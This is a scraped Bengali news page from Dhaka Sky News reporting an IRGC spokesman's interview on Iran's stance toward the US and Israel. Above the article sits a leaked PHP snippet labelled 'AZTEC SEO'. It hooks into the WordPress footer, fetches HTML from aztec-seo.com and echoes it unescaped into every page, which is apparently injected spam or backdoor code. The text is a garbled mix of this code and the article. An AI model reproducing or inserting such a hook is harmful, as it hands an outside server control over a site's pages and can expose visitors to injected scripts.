/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); শত্রুরা তর্জন-গর্জন আগেও করেছে | Dhaka Sky News

ইরান থেকে জ্বালানি নিতে চায় পাকিস্তান

আগের সংবাদ

সুচির বিরুদ্ধে আরো দুর্নীতির অভিযোগ আনা হচ্ছে

পরের সংবাদ

শত্রুরা তর্জন-গর্জন আগেও করেছে

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: March 18, 2021 , 10:39 pm

ইরানের ইসলামী বিপ্লবী গার্ড বাহিনী বা আইআরজিসি’র মুখপাত্র রামাজান শরীফ বলেছেন, মার্কিন যুক্তরাষ্ট্র ও ইহুদিবাদীদের মোকাবেলায় আইআরজিসি’র শক্তি বৃদ্ধিকে গুরুত্ব দেওয়া হচ্ছে।

তিনি ইরানের রাষ্ট্রীয় বেতারকে দেওয়া এক সাক্ষাৎকারে এ কথা বলেন।

রামাজান শরীফ আরও বলেছেন, ইসলামী বিপ্লবের ফলে আইআরজিসি’র জন্ম হয়েছে। গত ৪৩ বছরে সব সময় আইআরজিসিকে মার্কিনী, ইহুদিবাদী ও তাদের কোনো কোনো মিত্রের মোকাবেলা করতে হয়েছে।

আইআরজিসি’র মুখপাত্র বলেন, আইআরজিসি’র কমান্ডার কাসেম সোলাইমানিকে হত্যা করেছে আমেরিকা, এছাড়া আরও হাজার হাজার মানুষের মৃত্যুর জন্য আমেরিকা দায়ী। এর জন্য আমেরিকাকে ভুগতে হবে।

শত্রুদের নানা হুমকি-ধমকি প্রসঙ্গে তিনি বলেন, শত্রুরা সব সময় নানা ধরণের তর্জন-গর্জন করেছে। কিন্তু গত ৪৩ বছরে তারা কিছুই করতে পারেনি। আর এই মুহূর্তে ইরান ইতিহাসের সবচেয়ে শক্তিশালী অবস্থানে রয়েছে।

গতকাল (বুধবার) ছিল ইরানের ইসলামী বিপ্লবী গার্ড বাহিনী বা আইআরজিসি দিবস। এ উপলক্ষেই ইরানের জাতীয় সম্প্রচার সংস্থার পক্ষ থেকে এই বাহিনীর মুখপাত্রের সাক্ষাৎকার নেয়া হয়। সূত্র : পার্সটুডে